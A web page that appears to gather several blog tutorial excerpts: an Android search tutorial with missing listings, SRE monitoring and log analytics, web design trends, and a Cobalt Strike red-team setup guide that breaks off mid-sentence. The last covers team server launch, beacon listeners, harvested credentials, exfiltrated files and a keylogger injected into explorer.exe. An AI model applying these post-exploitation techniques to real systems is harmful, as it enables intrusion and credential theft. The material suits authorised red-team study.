    return true;
}

5. Create a new XML resource directory: res/xml.
6. Create a new file in res/xml called searchable.xml using the following XML:
7. Create a new layout called activity_search_result.xml using this XML:
8. Add a new Empty Activity to the project called SearchResultActivity.
9. Add the following variable to the class: TextView mTextViewSearchResult;
10. Change onCreate() to load our layout, set the TextView, and check for the QUERY action:
11. Add the following method to handle the search (a hedged sketch of steps 10 and 11 follows after this list):
12. With the user interface and code now complete, we just need to hook everything up correctly in the AndroidManifest. Here is the complete manifest, including both activities:
13. Run the application on a device or emulator. Type in a search query and hit the Search button (or press Enter). The SearchResultActivity will be displayed, showing the search query entered.
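The original listings for steps 10 and 11 appear only as screenshots; the following is a minimal, hedged sketch of how SearchResultActivity might check for the SEARCH intent and display the query. The layout and view IDs are placeholders, and the handleIntent() helper name is illustrative rather than taken from the book:

import android.app.SearchManager;
import android.content.Intent;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.widget.TextView;

public class SearchResultActivity extends AppCompatActivity {
    TextView mTextViewSearchResult;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_search_result);
        mTextViewSearchResult = findViewById(R.id.textViewSearchResult);
        // Check whether we were launched by the SearchManager with a search action
        handleIntent(getIntent());
    }

    private void handleIntent(Intent intent) {
        if (Intent.ACTION_SEARCH.equals(intent.getAction())) {
            // The text typed into the SearchView arrives in the QUERY extra
            String query = intent.getStringExtra(SearchManager.QUERY);
            mTextViewSearchResult.setText(query);
        }
    }
}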
How it works... Since the New Project Wizard uses the AppCompat library, our example uses the support library API. Using the support library provides the greatest device compatibility as it allows the use of modern features (such as the Action Bar) on older versions of the Android OS. We start by creating string resources for the Search View.  In step 3, we create the menu resource, as we've done many times. One difference is that we use the app namespace for the showAsAction and actionViewClass attributes. The earlier versions of the Android OS don't include these attributes in the Android namespace, which is why we create an app namespace. This serves as a way to bring new functionality to older versions of the Android OS. In step 4, we set up the SearchManager, using the support library APIs. Step 6 is where we define the searchable XML resource, which is used by the SearchManager. The only required attribute is the label, but a hint is recommended so the user will have an idea of what they should type in the field. The android:label must match the application name or the activity name and must use a string resource (as it does not work with a hardcoded string). Steps 7-11 are for the SearchResultActivity. Calling the second activity is not a requirement of the SearchManager, but is commonly done to provide a single activity for all searches initiated in your application. If you run the application at this point, you would see the search icon, but nothing would work. Step 12 is where we put it all together in the AndroidManifest file. The first item to note is the following: Notice this is in the <application> element and not in either of the <activity> elements. By defining it at the <application> level, it will automatically apply to all <activities>. If we moved it to the MainActivity element, it would behave exactly the same in our example. You can define styles for your application in the <application> node and still override individual activity styles in the <activity> node. We specify the searchable resource in the SearchResultActivity <meta-data> element: We also need to set the intent filter for SearchResultActivity as we do here: The SearchManager broadcasts the SEARCH intent when the user initiates the search. This declaration directs the intent to the SearchResultActivity activity. Once the search is triggered, the query text is sent to the SearchResultActivity using the SEARCH intent. We check for the SEARCH intent in the onCreate() and extract the query string using the following code: You now have the Search UI pattern fully implemented. With the UI pattern complete, what you do with the search results is specific to your application needs. Depending on your application, you might search a local database or maybe a web service. So, we discussed creating a shortcut on the Home screen, creating a Home screen widget and adding Search to the Action Bar. Be sure to check out the book 'Android 9 Development Cookbook - Third Edition', if you're interested in learning how to show your app in full-screen and enable lock screen shortcuts. Build your first Android app with Kotlin How to Secure and Deploy an Android App Android User Interface Development: Animating Widgets and Layouts


Post-production activities for ensuring and enhancing IT reliability [Tutorial]

Savia Lobo
13 Jan 2019
15 min read
Evolving business expectations are being duly automated through a host of delectable developments in the IT space. These improvements elegantly empower business houses to deliver newer and premium business offerings fast. Businesses are insisting on reliable business operations.  IT pundits and professors are therefore striving hard and stretching further to bring forth viable methods and mechanisms toward reliable IT. Site Reliability Engineering (SRE) is a promising engineering discipline, and its key goals include significantly enhancing and ensuring the reliability aspects of IT. In this tutorial, we will focus on the various ways and means of bringing up the reliability assurance factor by embarking on some unique activities in the post-production/deployment phase. Monitoring, measuring, and managing the various operational and behavioral data is the first and foremost step toward reliable IT infrastructures and applications. This tutorial is an excerpt from a book titled Practical Site Reliability Engineering written by Pethuru Raj Chelliah, Shreyash Naithani, Shailender Singh. This book will teach you to create, deploy, and manage applications at scale using Site Reliability Engineering (SRE) principles. All the code files for this book can be found at GitHub. Monitoring clouds, clusters, and containers The cloud centers are being increasingly containerized and managed. That is, there are going to be well-entrenched containerized clouds soon. The formation and managing of containerized clouds get simplified through a host of container orchestration and management tools. There are both open source and commercial-grade container-monitoring tools. Kubernetes is emerging as the leading container orchestration and management platform. Thus, by leveraging the aforementioned toolsets, the process of setting up and sustaining containerized clouds is accelerated, risk-free, and rewarding. The tool-assisted monitoring of cloud resources (both coarse-grained as well as fine-grained) and applications in production environments is crucial to scaling the applications and providing resilient services. In a Kubernetes cluster, application performance can be examined at many different levels: containers, pods, services, and clusters. Through a single pane of glass, the operational team can provide the running applications and their resource utilization details to their users. These will give users the right insights into how the applications are performing, where application bottlenecks may be found, if any, and how to surmount any deviations and deficiencies of the applications. In short, application performance, security, scalability constraints, and other pertinent information can be captured and acted upon. Cloud infrastructure and application monitoring The cloud idea has disrupted, innovated, and transformed the IT world. Yet, the various cloud infrastructures, resources, and applications ought to be minutely monitored and measured through automated tools. The aspect of automation is gathering momentum in the cloud era. A slew of flexibilities in the form of customization, configuration, and composition are being enacted through cloud automation tools. A bevy of manual and semi-automated tasks are being fully automated through a series of advancements in the IT space. In this section, we will understand the infrastructure monitoring toward infrastructure optimization and automation. 
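As a concrete illustration of the container, pod, service, and cluster-level visibility mentioned above, here is a small, hedged kubectl sketch; it assumes the cluster has the metrics-server add-on (or an equivalent metrics pipeline) installed:

# Resource usage per node: CPU cores and memory, plus the percentage of allocatable capacity in use
kubectl top nodes
# Resource usage per pod across all namespaces; add --containers for per-container figures
kubectl top pods --all-namespaces --containers
# Recent cluster events often point at scheduling or resource bottlenecks
kubectl get events --all-namespaces --sort-by=.metadata.creationTimestamp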
Enterprise-scale and mission-critical applications are being cloud-enabled so that they can be deployed in various cloud environments (private, public, community, and hybrid). Furthermore, applications are being meticulously developed and deployed directly on cloud platforms using a microservices architecture (MSA). Thus, besides cloud infrastructures, there are cloud-based IT platforms and middleware, business applications, and database management systems. The whole of IT is accordingly being modernized to be cloud-ready.

It is very important to precisely monitor and measure every asset and aspect of cloud environments. Organizations need the capability to precisely monitor the usage of the participating cloud resources. If there is any deviation, the monitoring feature triggers an alert so that the team concerned can decide on the next course of action. The monitoring capability includes viable tools for monitoring CPU usage per computing resource, the varying ratio between system activity and user activity, and the CPU usage of specific job tasks. Organizations also have to have an intrinsic capability for predictive analytics that allows them to capture trending data on memory utilization and filesystem growth. These details help the operational team to proactively plan the needed changes to computing, storage, and network resources before they encounter service availability issues. Timely action is essential for ensuring business continuity.

Not only infrastructures but also applications' performance levels have to be closely monitored in order to fine-tune application code as well as the infrastructure architecture. Typically, organizations find it easier to monitor the performance of applications that are hosted on a single server than the performance of composite applications that leverage several server resources. This becomes more tedious when the underlying compute resources are spread across multiple, distributed data centers. The major worry here is that the team loses visibility into, and control over, third-party data center resources. Enterprises, for different valid reasons, prefer a multi-cloud strategy for hosting their applications and data.

There are several IT infrastructure management tools, practices, and principles, but these traditional toolsets become obsolete in the cloud era. There are a number of distinct characteristics associated with software-defined cloud environments. Any cloud application is expected to innately fulfill non-functional requirements (NFRs) such as scalability, availability, performance, flexibility, and reliability. Research reports say that organizations across the globe enjoy significant cost savings and increased flexibility of management by modernizing and moving their applications into cloud environments.

The monitoring tool capabilities

It is paramount to deploy monitoring and management tools to effectively and efficiently run cloud environments, in which thousands of computing, storage, and network solutions are running. The key characteristics of such a tool are illustrated in the following diagram:

Here are some of the key features and capabilities needed to properly monitor modern cloud-based applications and infrastructures. Firstly, the ability to capture and query events and traces, in addition to data aggregation, is essential. When a customer buys something online, the buying process generates a lot of HTTP requests.
For proper end-to-end cloud monitoring, we need to see the exact set of HTTP requests the customer makes while completing the purchase. Any monitoring system has to have the capability to quickly identify bottlenecks and understand the relationships among different components. The solution has to give the exact response time of each component for each transaction. Critical metadata such as error traces and custom attributes ought to be made available to enhance trace and event data. By segmenting the data via user- and business-specific attributes, it is possible to prioritize improvements and sprint plans to optimize for those customers. Secondly, the monitoring system has to be able to monitor a wide variety of cloud environments (private, public, and hybrid). Thirdly, the monitoring solution has to scale for any emergency.

The benefits

Organizations that use the right mix of technology solutions for IT infrastructure and business application monitoring in the cloud stand to gain the following benefits:

Performance engineering and enhancement
On-demand computing
Affordability

Prognostic, predictive, and prescriptive analytics

Any operational environment needs data analytics and machine learning capabilities to be intelligent in its everyday actions and reactions. As data centers and server farms evolve and embrace new technologies (virtualization and containerization), it becomes more difficult to determine what impact these changes have on server, storage, and network performance. By using proper analytics, system administrators and IT managers can easily identify, and even predict, potential choke points and errors before they create problems. To know more about prognostic, predictive, and prescriptive analytics, head over to the book Practical Site Reliability Engineering.

Log analytics

Every software and hardware system generates a lot of log data (big data), and it is essential to do real-time log analytics to quickly understand whether there is any deviation or deficiency. This extracted knowledge helps administrators to consider countermeasures in time. Log analytics, if done systematically, facilitates preventive, predictive, and prescriptive maintenance. Workloads, IT platforms, middleware, databases, and hardware solutions all create a lot of log data when they work together to complete business functionalities. There are several log analytics tools on the market.

Open source log analytics platforms

If there is a need to handle all log data in one place, then ELK is touted as the best-in-class open source log analytics solution. There are application logs as well as system logs; log entries are typically errors, warnings, and exceptions. ELK is a combination of three different products, namely Elasticsearch, Logstash, and Kibana. The macro-level ELK architecture is given as follows:

Elasticsearch is a search engine based on Lucene that stores and retrieves data. Elasticsearch is, in a way, a NoSQL database; that is, it stores multi-structured data and does not support SQL as the query language. Elasticsearch exposes a REST API: documents are indexed with PUT or POST requests and queried through the _search endpoint. If you want real-time processing of big data, then Elasticsearch is the way forward. Increasingly, Elasticsearch is being primed for real-time and affordable log analytics (a minimal indexing and query sketch follows below).
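As a small, hedged illustration of that REST API, assuming a local Elasticsearch node on localhost:9200 and a hypothetical index called app-logs, indexing a log entry and then searching it for errors might look like this:

# Index a single log document into the app-logs index
curl -X POST "localhost:9200/app-logs/_doc" -H "Content-Type: application/json" -d '
{
  "timestamp": "2019-01-13T10:15:00Z",
  "level": "ERROR",
  "service": "checkout",
  "message": "Payment gateway timed out"
}'

# Query the same index for ERROR-level entries
curl -X GET "localhost:9200/app-logs/_search?q=level:ERROR&pretty"

In a full ELK deployment, Logstash (described next) would normally do this indexing for you, and Kibana would sit on top of the same _search API for visualization.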
Logstash is an open source, server-side data processing pipeline that ingests data from a variety of sources simultaneously, transforms it, and sends it on to a preferred destination. Logstash also handles unstructured data with ease. Logstash has more than 200 plugins built in, and it is easy to build your own.

Kibana is the last module of the famous ELK toolset and is an open source data visualization and exploration tool mainly used for performing log and time-series analytics, application monitoring, and IT operational analytics (ITOA). Kibana is gaining a lot of market and mind share, as it makes it easy to create histograms, line graphs, pie charts, and heat maps.

Logz.io offers a commercialized version of the ELK platform, which is widely regarded as the world's most popular open source log analysis stack. It is made available as an enterprise-grade service in the cloud and promises high availability, strong security, and scalability.

Cloud-based log analytics platforms

The log analytics capability is offered as a cloud-based, value-added service by various cloud service providers (CSPs). The Microsoft Azure cloud provides a log analytics service to its users/subscribers by constantly monitoring both cloud and on-premises environments, helping them take the right decisions to ensure availability and performance. The Azure cloud has its own monitoring mechanism in place through Azure Monitor, which collects and analyzes log data emitted by various Azure resources. The log analytics feature of the Azure cloud takes that monitoring data and correlates it with other relevant data to supply additional insights. The same capability is also made available for private cloud environments. It can collect all types of log data through various tools from multiple sources and consolidate them into a single, centralized repository. Then, the suite of analysis tools in log analytics, such as log searches and views, work together to provide you with centralized insights into your entire environment. The macro-level architecture is given here:

Similar services are offered by other cloud service providers, with AWS being one of the best-known among many.

The paramount contributions of log analytics tools include the following:

Infrastructure monitoring: Log analytics platforms easily and quickly analyze logs from bare metal (BM) servers and network solutions, such as firewalls, load balancers, application delivery controllers, CDN appliances, storage systems, virtual machines, and containers.
Application performance monitoring: The analytics platform captures application logs, which are streamed live, and tracks the assigned performance metrics for real-time analysis and debugging.
Security and compliance: The service provides immutable log storage, centralization, and reporting to meet compliance requirements. It offers deeper monitoring and decisive collaboration for extracting useful and usable insights.

AI-enabled log analytics platforms

Algorithmic IT Operations (AIOps) leverages proven AI algorithms to help organizations smooth the path toward their digital transformation goals. AIOps is touted as the way forward to substantially reduce IT operational costs. AIOps automates the process of analyzing IT infrastructures and business workloads to give administrators the right and relevant details about their functioning and performance levels.
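To give a feel for what that automation means in practice, here is a deliberately tiny Python sketch of statistical baselining: it flags any minute whose error count deviates sharply from a rolling baseline. The numbers, window size, and threshold are all made up for illustration; real AIOps platforms use far richer models than this.

# Toy baselining: flag minutes whose error count deviates from a rolling baseline.
from statistics import mean, stdev

errors_per_minute = [3, 4, 2, 5, 3, 4, 3, 2, 4, 3, 48, 5, 4]  # spike at index 10
WINDOW = 8          # how many past points form the baseline
THRESHOLD = 3.0     # how many standard deviations count as anomalous

for i in range(WINDOW, len(errors_per_minute)):
    baseline = errors_per_minute[i - WINDOW:i]
    mu, sigma = mean(baseline), stdev(baseline)
    value = errors_per_minute[i]
    if sigma and abs(value - mu) / sigma > THRESHOLD:
        print(f"minute {i}: {value} errors is anomalous "
              f"(baseline {mu:.1f} +/- {sigma:.1f})")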
AIOps minutely monitors each of the participating resources and applications and then intelligently formulates the various steps to be considered for their continuous well-being. AIOps helps to realize the goals of preventive and predictive maintenance of IT and business systems, and also comes out with prescriptive details for resolving issues with clarity and confidence. Furthermore, AIOps lets IT teams conduct root-cause analysis by identifying and correlating issues.

Loom

Loom is a leading provider of AIOps solutions. Loom's AIOps platform leverages machine-learning algorithms to automate the log analysis process quickly and easily. The real-time analytics capability of the ML algorithms enables organizations to arrive at the correct resolutions for issues and to complete the resolution tasks in an accelerated fashion. Loom delivers an AI-powered log analysis platform to predict all kinds of impending issues and prescribe the resolution steps. Outliers and anomalies are rapidly detected, and a strategically sound solution gets formulated with the assistance of this AI-centric log analytics platform.

IT operational analytics

Operational analytics helps with the following:

Extricating operational insights
Reducing IT costs and complexity
Improving employee productivity
Identifying and fixing service problems for an enhanced user experience
Gaining end-to-end insights critical to the business operations, offerings, and outputs

To facilitate operational analytics, there are integrated platforms, and their contributions are given as follows:

Troubleshoot applications, investigate security incidents, and facilitate compliance requirements in minutes instead of hours or days
Analyze various performance indicators to enhance system performance
Use report-generation capabilities to indicate the various trends in preferred formats (maps, charts, and graphs) and much more!

Thus, the operational analytics capability comes in handy for capturing operational data (real-time and batch) and crunching it to produce actionable insights that enable autonomic systems. Also, the operational team members, IT experts, and business decision-makers can get useful information for working out the correct countermeasures if necessary. The operational insights gained also convey what needs to be done to empower the systems under investigation to attain their optimal performance.

IT performance and scalability analytics

There are typically big gaps between the theoretical and practical performance limits. The challenge is how to enable systems to attain their theoretical performance level under any circumstance. The required performance level can suffer for various reasons, such as poor system design, bugs in software, network bandwidth, third-party dependencies, and I/O access. Middleware solutions can also contribute to unexpected performance degradation of the system. The system's performance has to be maintained under any load (user, message, and data). Performance testing is one way of recognizing performance bottlenecks and adequately addressing them; this testing is performed in the pre-production phase. Besides system performance, application scalability and infrastructure elasticity are other prominent requirements. There are two scalability options, indicated as follows:

Scale up, for fully utilizing SMP hardware
Scale out, for fully utilizing distributed processors

It is also possible to have both at the same time.
That is, to scale up and out is to combine the two scalability choices.

IT security analytics

IT infrastructure security, application security, and data security (at rest, in transit, and in use) are the top three security challenges, and there are security solutions approaching these issues at different levels and layers. Access-control mechanisms, cryptography, hashing, digests, digital signatures, watermarking, and steganography are the well-known and widely used techniques for ensuring strong security. There is also security testing and ethical hacking for identifying any security risk factors and eliminating them at an early stage. All kinds of security holes, vulnerabilities, and threats are meticulously unearthed in order to deploy defect-free, safety-critical, and secure software applications. During the post-production phase, security-related data is extracted from both software and hardware products to derive precise security insights, which in turn go a long way toward empowering security experts and architects to bring forth viable solutions that ensure the utmost security and safety for IT infrastructures and software applications.

The importance of root-cause analysis

The cost of service downtime keeps growing. There are reports stating that the cost of downtime can range from $72,000 to $100,000 per minute. Identifying the root cause (the mean time to identification, or MTTI) generally takes hours; for a complex situation, the process may run into days. OverOps analyzes code in staging and production to automatically detect and deliver the root causes of all errors, with no dependency on logging. OverOps shows you a stack trace for every error and exception, but it also shows you the complete source code, objects, variables, and values that caused that error or exception to be thrown. This assists in identifying the root cause when your code breaks. OverOps injects a hyperlink into the exception, so you'll be able to jump directly into the source code and the actual variable state that caused it. OverOps can co-exist in production alongside all the major APM agents and profilers. Using OverOps with your APM allows you to monitor server slowdowns and errors, along with the ability to drill down into the real root cause of each issue.

Summary

There are several activities being strategically planned and executed to enhance the resiliency, robustness, and versatility of enterprise, edge, and embedded IT. This tutorial described various kinds of post-production data analytics that allow you to gain a deeper understanding of applications, middleware solutions, databases, and IT infrastructures so that you can manage them effectively and efficiently. In order to gain experience working with SRE concepts and be able to deliver highly reliable apps and services, check out the book Practical Site Reliability Engineering.

Site reliability engineering: Nat Welch on what it is and why we need it [Interview]
Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity
5 ways artificial intelligence is upgrading software engineering

7 Web design trends and predictions for 2019

Guest Contributor
12 Jan 2019
6 min read
Staying updated about web design trends is very crucial. The latest norm today may change tomorrow with shifting algorithms, captivating visuals and introduction of best practices. Remaining on top by frequently reforming your website is thus quintessential to avoid looking like a reminiscent of an outdated website. 2019 will be all about engaging website designs focusing on flat designs, captivating structures & layouts, speed, mobile performance and so on. Here are 7 web design predictions which we think will be trending in 2019 #1 Website speed You would have come across this pivotal aspect of web design. It is strongly recommended for the loading time of websites to be necessarily less than three seconds to have a lasting impact on visitors. Having your visitors waiting for more than this duration would result in a high bounce rate. Based on a survey by Aberdeen Group, 5% of organizations found that website visitors abandoned their website in a second of delay. Enthralling website design with overloaded data slowing your page speed could eat up on your revenue in a huge way. Google Speed updates which came into effect from July 2018 emphasize the need to focus on the page loading time. Moreover, Google prioritizes and ranks faster loading websites. Though the need for videos and images still exists in web design, the need in 2019 will be to reduce the page loading time without compromising on the look of the website. #2 Mobile first phenomenon With user preferences inclined greatly towards mobile devices, the need for the “mobile first” web design has become the need of the hour. This is not only to rank higher on SERP but also to boost the quality of customer experiences on the device. Websites need to be exclusively designed for mobile devices in the first place. The mobile first web design is a completely focused conceptualization of the website on mobile taking into consideration parameters like a responsive and user-friendly design. Again, 2019 will need more of optimization inclined towards voice search. Users are impatient to get hold of information in the fastest way possible. Voice search on mobile will include: Focusing on long tail keywords, conversational and natural spoken language. Appropriate usage of schema metadata Emphasize on semantics Optimization based on local listing This is yet another unmissable trend of 2019. #3 Flat designs Clutter-free, focused websites have always been in demand. Flat design is all about minimalism and improved usability. This kind of design helps to focus on the important parts of the website using bright colors, clean-edged designs and a lot of free space. There are two reasons for website owners to opt for flat designs in 2019. They contain lesser components which are data-light, and are fast- loading, improving the website speed and optimization quotient. Also, it enhances customer experience with a quick loading website on both the mobile and desktop versions. So by adapting to flat designs, websites can stay back longer on user favorite lists, in turn, churning out elevated conversion rates. #4 Micro-animations Micro animations may seem like minute features on a webpage but they do add great value. A color change when you click the submit button conveys that the action has been performed. An enlarged list when you point the mouse on a particular product makes your presence felt. Such animations communicate to the user about actions accomplished. Again, visuals are always captivating, be it a background video or a micro animation. 
Such micro animations do impact by creating a visual hierarchy and compelling users towards conversion points. So micro animations are definitely here to stay back in 2019. #5 Chatbots Chatbots have become much more common as they help bridge communication gaps. This is because these chatbots have emerged smarter with improved Artificial Intelligence and machine learning techniques. They can improve response time, personalize communication and automate repetitive tasks. Chatbots understand our data based on previous chat history, predict what we might be looking for and give us auto recommendations about products. Chatbots can sense our interest and provide us with personalized ad content thereby enhancing customer satisfaction. Chatbots serve as crucial touch points. They can intelligently handle customer service while collecting sensitive customer data for the sales team. This way you can analyze your customer base even before initiating a first cut discussion with them. 2019 will be a year which will see many more such interactions being incorporated in websites. #6 Single page designs Simple, clutter-free and single page design is going to be a buzzword of 2019. When we say single page design it literally means a single page without extra links leading to blogs or detailed services. The next question would be about SEO optimization based on keywords and content. To begin with, a single page designed websites have a neatly siloed hierarchy. As they do not have aspects that slow down your website, they are easily compatible across devices. The page-less design has minimal HTML and JavaScript which improves customer experience, in turn, helping to earn a higher keyword ranking on SEO. Also, with way lesser elements on the page, they can be managed easily. Frequent updates and changes based on customer expectations and trends can be done at regular intervals adding greater value to the website. This is yet another aspect to watch in 2019. #7 Shapes incorporated Incorporating simple geometric shapes on your website could do wonders with its appearance. They are easily loadable and are also engaging. Shapes are similar to colors which throw an impact on the mood of the visitors. Rectangles showcase stability, circles represent unity and triangles are supposed to reflect dynamism. Using shapes based on your aesthetic sense either sparingly or liberally can definitely catch the attention of your visitors. You could place them in areas you want to seek attention and create a visual hierarchy. Implementing geometric shapes on your website will drive traffic and affect your potential sales in a huge way. Staying on top of the competition is all about presenting fresh ideas without compromising on the quality of services and user experience. Emerge as a pacesetter on par with upcoming trends and differentiate your services in the current milieu to reap maximum benefits. Author Bio Swetha S. is adept at creating customer-centered marketing strategies focused on augmenting brand presence. She is currently the Digital Marketing Manager for eGrove Systems and Elite Site optimizer, contributing towards the success of the organization.

Red Team Tactics: Getting started with Cobalt Strike [Tutorial]

Savia Lobo
12 Jan 2019
15 min read
According to cobaltstrike.com: "Cobalt Strike is a software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response." This tutorial is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of what Cobalt Strike is, how to set it up, and also about its interface. Before installing Cobalt Strike, please make sure that you have Oracle Java installed with version 1.7 or above. You can check whether or not you have Java installed by executing the following command: java -version If you receive the java command not found error or another related error, then you need to install Java on your system. You can download this here: https://www.java.com/en/. Cobalt Strike comes in a package that consists of a client and server files. To start with the setup, we need to run the team server. The following are the files that you'll get once you download the package: The first thing we need to do is run the team server script located in the same directory. What is a team server? This is the main controller for the payloads that are used in Cobalt Strike. It logs all of the events that occur in Cobalt Strike. It collects all the credentials that are discovered in the post-exploitation phase or used by the attacker on the target systems to log in. It is a simple bash script that calls for the Metasploit RPC service (msfrpcd) and starts the server with cobaltstrike.jar. This script can be customized according to the needs. Cobalt Strike works on a client-server model in which the red-teamer connects to the team server via the Cobalt Strike client. All the connections (bind/reverse) to/from the victims are managed by the team server. The system requirements for running the team server are as follows: System requirements: 2 GHz+ processor 2 GB RAM 500MB+ available disk space Amazon EC2: At least a high-CPU medium (c1.medium, 1.7 GB) instance Supported operating systems: Kali Linux 1.0, 2.0 – i386 and AMD64 Ubuntu Linux 12.04, 14.04 – x86, and x86_64 The Cobalt Strike client supports: Windows 7 and above macOS X 10.10 and above Kali Linux 1.0, 2.0 – i386 and AMD64 Ubuntu Linux 12.04, 14.04 – x86, and x86_64 As shown in the following screenshot, the team server needs at least two mandatory arguments in order to run. This includes host, which is an IP address that is reachable from the internet. If behind a home router, you can port forward the listener's port on the router. The second mandatory argument is password, which will be used by the team server for authentication: The third and fourth arguments specify a Malleable C2 communication profile and a kill date for the payloads (both optional). A Malleable C2 profile is a straightforward program that determines how to change information and store it in an exchange. It's a really cool feature in Cobalt Strike. 
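As a convenience, the prerequisite check and the launch can be scripted. The following Python snippet is a hypothetical helper, not something shipped with Cobalt Strike: it confirms that a java binary is available, then runs the teamserver script with the host and password used in this tutorial, plus an optional Malleable C2 profile. The relative ./teamserver path and the sudo call are assumptions about your local setup.

# Hypothetical launcher for the Cobalt Strike team server.
import shutil
import subprocess
import sys

def java_available():
    """Return True if a 'java' binary is on the PATH and reports a version."""
    if shutil.which("java") is None:
        return False
    # 'java -version' prints its banner to stderr
    result = subprocess.run(["java", "-version"], capture_output=True, text=True)
    return result.returncode == 0 and "version" in result.stderr.lower()

def start_teamserver(host, password, profile=None):
    cmd = ["sudo", "./teamserver", host, password]
    if profile:
        cmd.append(profile)           # optional Malleable C2 profile
    print("Running:", " ".join(cmd))
    subprocess.run(cmd)               # blocks while the team server runs

if __name__ == "__main__":
    if not java_available():
        sys.exit("Java 1.7+ is required but was not found")
    start_teamserver("192.168.10.122", "harry@123")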
The team server must run with the root privileges so that it can start the listener on system ports (port numbers: 0-1023); otherwise, you will receive a Permission denied error when attempting to start a listener: The Permission denied error can be seen on the team server console window, as shown in the following screenshot: Now that the concept of the team server has been explained, we can move on to the next topic. You'll learn how to set up a team server for accessing it through Cobalt Strike. Cobalt Strike setup The team server can be run using the following command: sudo ./teamserver 192.168.10.122 harry@123 Here, I am using the IP 192.168.10.122 as my team server and harry@123 as my password for the team server: If you receive the same output as we can see in the preceding screenshot, then this means that your team server is running successfully. Of course, the SHA256 hash for the SSL certificate used by the team server will be different each time it runs on your system, so don't worry if the hash changes each time you start the server. Upon successfully starting the server, we can now get on with the client. To run the client, use the following command: java -jar cobaltstrike.jar This command will open up the connect dialog, which is used to connect to the Cobalt Strike team server. At this point, you need to provide the team server IP, the Port number (which is 50050, by default), the User (which can be any random user of your choice), and the Password for the team server. The client will connect with the team server when you press the Connect button. Upon successful authorization, you will see a team server fingerprint verification window. This window will ask you to show the exact same SHA256 hash for the SSL certificate that was generated by the team server at runtime. This verification only happens once during the initial stages of connection. If you see this window again, your team server is either restarted or you are connected to a new device. This is a precautionary measure for preventing Man-in-the-Middle (MITM) attacks: Once the connection is established with the team server, the Cobalt Strike client will open: Let's look further to understand the Cobalt Strike interface so that you can use it to its full potential in a red-team engagement. Cobalt Strike interface The user interface for Cobalt Strike is divided into two horizontal sections, as demonstrated in the preceding screenshot. These sections are the visualization tab and the display tab. The top of the interface shows the visualization tab, which visually displays all the sessions and targets in order to make it possible to better understand the network of the compromised host. The bottom of the interface shows the display tab, which is used to display the Cobalt Strike features and sessions for interaction. Toolbar Common features used in Cobalt Strike can be readily accessible at the click of a button. 
The toolbar offers you all the common functions to speed up your Cobalt Strike usage: Each feature in the toolbar is as follows: Connecting to another team server In order to connect to another team server, you can click on the + sign, which will open up the connect window: All of the previous connections will be stored as a profile and can be called for connection again in the connect window: Disconnecting from the team server By clicking on the minus (–) sign, you will be disconnected from the current instance of the team server: You will also see a box just above the server switchbar that says Disconnected from team server. Once you disconnect from the instance, you can close it and continue the operations on the other instance. However, be sure to bear in mind that once you close the tab after disconnection, you will lose all display tabs that were open on that particular instance. What's wrong with that? This may cause some issues. This is because in a red-team operation you do not always have the specific script that will execute certain commands and save the information in the database. In this case, it would be better to execute the command on a shell and then save the output on Notepad or Sublime. However, not many people follow this practice, and hence they lose a lot of valuable information. You can now imagine how heart-breaking it can be to close the instance in case of disconnection and find that all of your shell output (which was not even copied to Notepad) is gone! Configure listeners For a team server to function properly, you need to configure a listener. But before we can do this, we need to know what a listener actually is. Just like the handler used in Metasploit (that is, exploit/multi/handler), the Cobalt Strike team server also needs a handler for handling the bind/reverse connections to and from the target/victim's system/server. You can configure a listener by clicking on the headphones-like icon: After clicking the headphones icon, you'll open the Listeners tab in the bottom section. Click on the Add button to add a new listener: You can choose the type of payload you want to listen for with the Host IP address and the port to listen on for the team server or the redirector: In this case, we have used a beacon payload, which will be communicating over SSL. Beacon payloads are a special kind of payload in Cobalt Strike that may look like a generic meterpreter but actually have much more functionality than that. Beacons will be discussed in more detail in further chapters. As a beacon uses HTTP/S as the communication channel to check for the tasking allotted to it, you'll be asked to give the IP address for the team server and domain name in case any redirector is configured (Redirectors will be discussed in more details in further chapters): Once you're done with the previous step, you have now successfully configured your listener. Your listener is now ready for the incoming connection: Session graphs To see the sessions in a graph view, you can click the button shown in the following screenshot: Session graphs will show a graphical representation of the systems that have been compromised and injected with the payloads. In the following screenshot, the system displayed on the screen has been compromised. 
PT is the user, PT-PC is the computer name (hostname), and the numbers just after the @ are the PIDs of the processes that have the payload injected into them: When you escalate the privileges from a normal user to NT AUTHORITY\SYSTEM (vertical privilege escalation), the session graph will show the system in red and surrounded by lightning bolts. There is also another thing to notice here: the * (asterisk) just after the username. This means that the system with PID 1784 is escalated to NT AUTHORITY\SYSTEM: Session table To see the open sessions in a tabular view, click on the button shown in the following screenshot: All the sessions that are opened in Cobalt Strike will be shown along with the sessions' details. For example, this may include external IP, internal IP, user, computer name, PID into which the session is injected, or last. Last is an element of Cobalt Strike that is similar to WhatsApp's Last Seen feature, showing the last time that the compromised system contacted the team server (in seconds). This is generally used to check when the session was last active: Right-clicking on one of the sessions gives the user multiple options to interact with, as demonstrated in the following screenshot: These options will be discussed later in the book. Targets list To view the targets, click on the button shown in the following screenshot: Targets will only show the IP address and the computer name, as follows: For further options, you can right-click on the target: From here, you can interact with the sessions opened on the target system. As you can see in the preceding screenshot, PT@2908 is the session opened on the given IP and the beacon payload resides in the PID 2908. Consequently, we can interact with this session directly from here: Credentials Credentials such as web login passwords, password hashes extracted from the SAM file, plain-text passwords extracted using mimikatz, etc. are retrieved from the compromised system and are saved in the database. They can be displayed by clicking on the icon shown in the following screenshot: When you perform a hashdump in Metasploit (a post-exploitation module that dumps all NTLM password hashes from the SAM database), the credentials are saved in the database. With this, when you dump hashes in Cobalt Strike or when you use valid credentials to log in, the credentials are saved and can be viewed from here: Downloaded files To view all the exfiltrated data from the target system, you can click on the button shown in the following screenshot: This will show the files (exfiltration) that were downloaded from the target system: Keystrokes This option is generally used when you have enabled a keylogger in the beacon. The keylogger will then log the keystrokes and send it to the beacon. To use this option, click the button shown in the following screenshot: When a user logs into the system, the keylogger will log all the keystrokes of that user (explorer.exe is a good candidate for keylogging). So, before you enable the keylogger from the beacon, migrate or inject a new beacon into the explorer.exe process and then start the 